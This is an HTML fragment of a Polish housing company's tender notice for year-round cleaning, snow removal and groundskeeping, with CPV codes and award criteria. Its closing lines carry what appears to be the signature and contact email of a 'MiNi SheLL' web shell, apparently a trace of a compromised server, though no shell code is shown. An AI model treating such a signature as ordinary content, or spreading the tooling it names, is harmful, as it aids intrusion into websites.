<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych przez Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o. w obszarach działania Oddziałów Eksploatacji.
Do obowiązków Wykonawcy należy:
1. Sprzątanie klatek schodowych i pomieszczeń wspólnego użytku, polegające na   (z zastrzeżeniem, że użyty w niniejszym paragrafie termin (codzienne) należy odnieść do dni roboczych):
a.zamiataniu klatek schodowych - codziennie do godziny 11-tej
b.zamiataniu pomieszczeń w.c. wspólnego użytku - codziennie do godziny 11-tej
c.myciu i zamiataniu kabin wind - codziennie do godziny 11-tej
d.myciu klatek schodowych, obejmującym podłogi, schody, parapety, drzwi wejściowe (do klatek schodowych, piwnic, strychów, pomieszczeń wspólnego użytku), grzejników, skrzynek listowych, lamperii, balustrad, poręczy, kloszy lamp, pomieszczeń w.c. wspólnego użytku - dwa razy w miesiącu
e.myciu okien na klatkach schodowych i w pomieszczeniach wspólnego użytku - 1 raz na kwartał
f.zamiataniu korytarzy piwnicznych - 1 raz w miesiącu
g.sprzątaniu i zamiataniu pomieszczeń strychowych - 1 raz w miesiącu, 
h.usuwaniu zanieczyszczeń będących skutkami awarii - każdorazowo po ich powstaniu
i.usuwaniu pajęczyn - codziennie do godziny 11-tej
j.deratyzacji (środkami chemicznymi dostarczonymi przez właściwy Oddział Eksploatacji) - na żądanie Zamawiającego.
2.Sprzątanie chodników polegające na:
a.codziennym sprzątaniu - zamiataniu chodników, dróg wewnątrz osiedlowych, placów, podwórzy, bram, prześwitów, wnęk przy okienkach piwnicznych oraz podłoży osłon śmietnikowych,
b.codziennym czyszczeniu wycieraczek przed wejściami do klatek schodowych,
c.codziennym opróżnianiu ze śmieci koszy przy ławkach,
d.usuwaniu śniegu i lodu oraz posypywaniu piaskiem chodników, dojść                  do klatek schodowych i osłon śmietnikowych, dróg wewnątrz osiedlowych, oczyszczaniu ze śniegu i lodu studzienek ściekowych. Czynności te muszą być wykonane codziennie do godziny 7- ej rano. 
 W przypadku ciągłych i nadmiernych opadów śniegu Wykonawca   
 zobowiązany jest do wykonywania powyższych czynności na bieżąco                 
 w ciągu całego dnia, również w soboty, niedziele i święta.
3.Sprzątanie terenów zielonych polegające na:
a.codziennym usuwaniu nieczystości z terenów zielonych,
b.wygrabianiu liści - zakres prac obejmuje bieżące wygrabianie liści, ich załadunek oraz wywiezienie z terenu (wybór miejsca wywózki i koszty składowania lub unieszkodliwiania obciążą Wykonawcę; na żądanie Zamawiającego Wykonawca zobowiązany jest do udokumentowania wywozu zgrabionych liści umową zawartą z firmą zajmującą się odbiorem odpadów; w przypadku wywożenia zgrabionych liści we własnym zakresie, Wykonawca zobowiązany jest do udokumentowania wywozu fakturami za ich składowanie lub unieszkodliwienie, bądź do wskazania miejsca ich składowania lub unieszkodliwiania),
c.przycinaniu krzewów, żywopłotów i odrostów przy drzewach - zakres prac obejmuje również załadunek  oraz wywiezienie z terenu (wybór miejsca wywózki i koszty składowania lub unieszkodliwiania obciążą Wykonawcę; na żądanie Zamawiającego Wykonawca zobowiązany jest do udokumentowania wywozu umową zawartą z firmą zajmującą się odbiorem odpadów; w przypadku wywożenia obciętych gałęzi krzewów, żywopłotów i odrostów przy drzewach we własnym zakresie, Wykonawca zobowiązany jest do udokumentowania wywozu fakturami za ich składowanie  lub unieszkodliwienie, bądź do wskazania miejsca ich składowania lub unieszkodliwiania),
d.koszeniu trawników 
- w roku 2012 - nie mniej niż dwukrotne koszenie trawników (w okresie od lipca do września)
- w roku 2013 - nie mniej niż jednokrotne koszenie trawników (w okresie od maja do 15 czerwca),
w terminach uzgodnionych i potwierdzonych na piśmie z właściwym Oddziałem Eksploatacji, zakres prac obejmuje koszenie trawników wraz z grabieniem i usunięciem z terenu skoszonej trawy w terminie 48 godzin od skoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.61.20.00-0, 90.62.00.00-9, 90.63.00.00-2, 77.31.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. ilość osób bezrobotnych zadeklarowana przez Wykonawcę - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych przez Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o. - w obszarze działania :
Oddziału Eksploatacji przy ul. Nowowiejskiego 26  (DEO  IV)
Oddziału Eksploatacji przy ul. Łukasińskiego 26 ( DEO VI ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest stałe utrzymanie czystości wewnątrz budynków oraz terenów przynależnych do budynków, użytkowanych i zarządzanych przez Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o. w obszarach działania Oddziałów Eksploatacji.
Do obowiązków Wykonawcy należy:
1.Sprzątanie klatek schodowych i pomieszczeń wspólnego użytku, polegające na    (z zastrzeżeniem, że użyty w niniejszym paragrafie termin (codzienne) należy odnieść do dni roboczych):
a.zamiataniu klatek schodowych - codziennie do godziny 11-tej
b.zamiataniu pomieszczeń w.c. wspólnego użytku - codziennie do godziny 11-tej
c.myciu i zamiataniu kabin wind - codziennie do godziny 11-tej
d.myciu klatek schodowych, obejmującym podłogi, schody, parapety, drzwi wejściowe (do klatek schodowych, piwnic, strychów, pomieszczeń wspólnego użytku), grzejników, skrzynek listowych, lamperii, balustrad, poręczy, kloszy lamp, pomieszczeń w.c. wspólnego użytku - dwa razy  w miesiącu
e.myciu okien na klatkach schodowych i w pomieszczeniach wspólnego użytku - 1 raz na kwartał
f.zamiataniu korytarzy piwnicznych - 1 raz w miesiącu
g.sprzątaniu i zamiataniu pomieszczeń strychowych - 1 raz w miesiącu, 
h.usuwaniu zanieczyszczeń będących skutkami awarii - każdorazowo po ich powstaniu
i.usuwaniu pajęczyn - codziennie do godziny 11-tej
j.deratyzacji (środkami chemicznymi dostarczonymi przez właściwy Oddział Eksploatacji) - na żądanie Zamawiającego.
2.Sprzątanie chodników polegające na:
a.codziennym sprzątaniu - zamiataniu chodników, dróg wewnątrz osiedlowych, placów, podwórzy, bram, prześwitów, wnęk przy okienkach piwnicznych oraz podłoży osłon śmietnikowych,
b.codziennym czyszczeniu wycieraczek przed wejściami do klatek schodowych,
c.codziennym opróżnianiu ze śmieci koszy przy ławkach,
d.usuwaniu śniegu i lodu oraz posypywaniu piaskiem chodników, dojść                  do klatek schodowych i osłon śmietnikowych, dróg wewnątrz osiedlowych, oczyszczaniu ze śniegu i lodu studzienek ściekowych. Czynności te muszą być wykonane codziennie do godziny 7- ej rano. 
W przypadku ciągłych i nadmiernych opadów śniegu Wykonawca   
zobowiązany jest do wykonywania powyższych czynności na bieżąco                 
w ciągu całego dnia, również w soboty, niedziele i święta.
3.Sprzątanie terenów zielonych polegające na:
a.codziennym usuwaniu nieczystości z terenów zielonych,
b.wygrabianiu liści - zakres prac obejmuje bieżące wygrabianie liści, ich załadunek oraz wywiezienie z terenu (wybór miejsca wywózki i koszty składowania lub unieszkodliwiania obciążą Wykonawcę; na żądanie Zamawiającego Wykonawca zobowiązany jest do udokumentowania wywozu zgrabionych liści umową zawartą z firmą zajmującą się odbiorem odpadów; w przypadku wywożenia zgrabionych liści we własnym zakresie, Wykonawca zobowiązany jest do udokumentowania wywozu fakturami za ich składowanie lub unieszkodliwienie, bądź do wskazania miejsca ich składowania lub unieszkodliwiania),
c.przycinaniu krzewów, żywopłotów i odrostów przy drzewach - zakres prac obejmuje również załadunek  oraz wywiezienie z terenu (wybór miejsca wywózki i koszty składowania lub unieszkodliwiania obciążą Wykonawcę; na żądanie Zamawiającego Wykonawca zobowiązany jest do udokumentowania wywozu umową zawartą z firmą zajmującą się odbiorem odpadów; w przypadku wywożenia obciętych gałęzi krzewów, żywopłotów  i odrostów przy drzewach we własnym zakresie, Wykonawca zobowiązany jest do udokumentowania wywozu fakturami za ich składowanie lub unieszkodliwienie, bądź do wskazania miejsca ich składowania lub unieszkodliwiania),
d.koszeniu trawników 
- w roku 2012 - nie mniej niż dwukrotne koszenie trawników (w okresie od lipca do września)
- w roku 2013 - nie mniej niż jednokrotne koszenie trawników (w okresie od maja do 15 czerwca),
w terminach uzgodnionych i potwierdzonych na piśmie z właściwym Oddziałem Eksploatacji, zakres prac obejmuje koszenie trawników wraz z grabieniem i usunięciem z terenu skoszonej trawy w terminie 48 godzin od skoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.61.20.00-0, 90.62.00.00-9, 90.63.00.00-2, 77.31.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. ilość osób bezrobotnych zadeklarowana przez Wykonawcę - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com